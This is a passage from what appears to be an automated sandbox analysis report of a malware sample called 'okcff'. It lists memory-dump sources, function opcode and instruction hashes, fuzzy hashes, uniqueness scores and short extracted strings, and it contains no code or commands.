                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: 7f349db6f8ac2ebb24cab632806636d2ea2c45833cec5adc7e1518fadd371c36
                                                            • Instruction ID: 9609b8907129f1802fd81eb8c2f2f129e6d5fa085ee7b973526ef89c1f94b818
                                                            • Opcode Fuzzy Hash: 7f349db6f8ac2ebb24cab632806636d2ea2c45833cec5adc7e1518fadd371c36
                                                            • Instruction Fuzzy Hash: 8A822C71E442199FCB14CF99C884AAEF7F2BF88310F1A8166E919EB355D7359C81CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: e7b755c9ac4f41503106f15a91cf56b3bb65b7e38374180c9f692f4100dfe2ab
                                                            • Instruction ID: fe6edd46b787e8c6df7e0243e6aed60be0ee0e8d45509c3cf601658917293849
                                                            • Opcode Fuzzy Hash: e7b755c9ac4f41503106f15a91cf56b3bb65b7e38374180c9f692f4100dfe2ab
                                                            • Instruction Fuzzy Hash: EB022B31E442199FCB14CF99C884AAEFBF2EF88310F1A8566E919EB351D7349C41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: 80de35fc3b9e13331aebccd35c11441378605b0d4e0202f78ac723a3fa492fcc
                                                            • Instruction ID: dcab64322ee9c13c343cf86baec2983abeeaaea0cee4cca403be532a24cfee76
                                                            • Opcode Fuzzy Hash: 80de35fc3b9e13331aebccd35c11441378605b0d4e0202f78ac723a3fa492fcc
                                                            • Instruction Fuzzy Hash: 22D11734A406049FCB14EF68C5C4AAAB7F6EF88705F6684A9E9159B361DB31EC42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 64443d776efa9b83bd622ee4b2d0eeb4d16229c1b9456890c20790a948f58c3f
                                                            • Instruction ID: d079b49505592174000df7e93c63248aff76e6b15e3bf3f40649c11759433833
                                                            • Opcode Fuzzy Hash: 64443d776efa9b83bd622ee4b2d0eeb4d16229c1b9456890c20790a948f58c3f
                                                            • Instruction Fuzzy Hash: D22218347402048FDB18EF39D9D4AAA77F6AF89314B1584A9E916DB3A5DB30EC41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa60497bc428e71e0835fa36007af6e2c6aba52a1f8c5261535199c7a95b319
                                                            • Instruction ID: c11dd5627f70de3accce2685a3669a8d479612c3c70cce9a60c2cd74d2d1a324
                                                            • Opcode Fuzzy Hash: dfa60497bc428e71e0835fa36007af6e2c6aba52a1f8c5261535199c7a95b319
                                                            • Instruction Fuzzy Hash: 47E18130E042398FCB14CFAAC980AEDBBF2BF84304F59C5AAD459AB255D7749985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21b1f08847d8447906a1a23655229167207fb5aa961a6cfd2d087548867eae71
                                                            • Instruction ID: b862d7f2fc5387a3983e7839757cda5da4ef7d57c007823026a1ae3576ffd6b1
                                                            • Opcode Fuzzy Hash: 21b1f08847d8447906a1a23655229167207fb5aa961a6cfd2d087548867eae71
                                                            • Instruction Fuzzy Hash: AEA15C70E142398FCB14CFAAC980AEDB7F2BF88304F59C59AD419AB255D774A985CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$.@ll$Duo$Duo
                                                            • API String ID: 0-2702638943
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,G4p$J4p
                                                            • API String ID: 0-1940359148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +Z
                                                            • API String ID: 0-436195615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J4p
                                                            • API String ID: 0-3179121579
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,G4p$J4p
                                                            • API String ID: 0-1940359148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll$fCll
                                                            • API String ID: 0-2296306532
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +Z
                                                            • API String ID: 0-436195615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: h\
                                                            • API String ID: 0-3510250863
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J4p
                                                            • API String ID: 0-3179121579
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KDBM
                                                            • API String ID: 0-3504354710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <k
                                                            • API String ID: 0-713558839
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dee61b0242ccc26cc10b255cf2862835c446e0b22c89978711a83a6da52c9c5
                                                            • Instruction ID: 5e22cb239533fcd4b4aafa995138885bfeb4f31b8f122179831e4921f2eb1bc8
                                                            • Opcode Fuzzy Hash: 5dee61b0242ccc26cc10b255cf2862835c446e0b22c89978711a83a6da52c9c5
                                                            • Instruction Fuzzy Hash: 1331AE306153408FDB02DB74C958AADBBF1AF8A300F1445AAE50ADB3E2DB75DE15CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77e4573074130e25000331ce6d38722dda32d4c08d8b1f8d3262916311d95c51
                                                            • Instruction ID: 663d101f343fd257751bea53f4f01a1b9c64cf170e179cbe1b51678382e132c7
                                                            • Opcode Fuzzy Hash: 77e4573074130e25000331ce6d38722dda32d4c08d8b1f8d3262916311d95c51
                                                            • Instruction Fuzzy Hash: 5D2156347107025BEB348D59D4C072AB3E5EB59320F248D2BE85EC77D2D625EC718B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02ece0aac07834da5dfdf52c4c33a859c08f9c522ce68ad59e2d9366038823c5
                                                            • Instruction ID: b0e9a3768ba6ec6353ec9f56b82dcc90fb0b53cd89b3d6df4f84e41bf4327e5a
                                                            • Opcode Fuzzy Hash: 02ece0aac07834da5dfdf52c4c33a859c08f9c522ce68ad59e2d9366038823c5
                                                            • Instruction Fuzzy Hash: A221A1347147425FEB318E59C4C0B26B7E5EB5A320F248D2BE89AC77D2C624EC718B42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f60632c3100128fcf118d9b945920dc656ddb90d1cc3c0ac1ee806d25bbfa10
                                                            • Instruction ID: bea06e6e85ee038b9ef6ebc8c039ee8321743782d591a8bffb7d2b1649163b0d
                                                            • Opcode Fuzzy Hash: 0f60632c3100128fcf118d9b945920dc656ddb90d1cc3c0ac1ee806d25bbfa10
                                                            • Instruction Fuzzy Hash: 4E316C30A01204CFCB54AB74D9196AD77F2AF89305F104568E802DB3A1DF369D55CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699262856.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_cd000_okcff.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699289585.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_dd000_okcff.jbxd
                                                            Non-executed Functions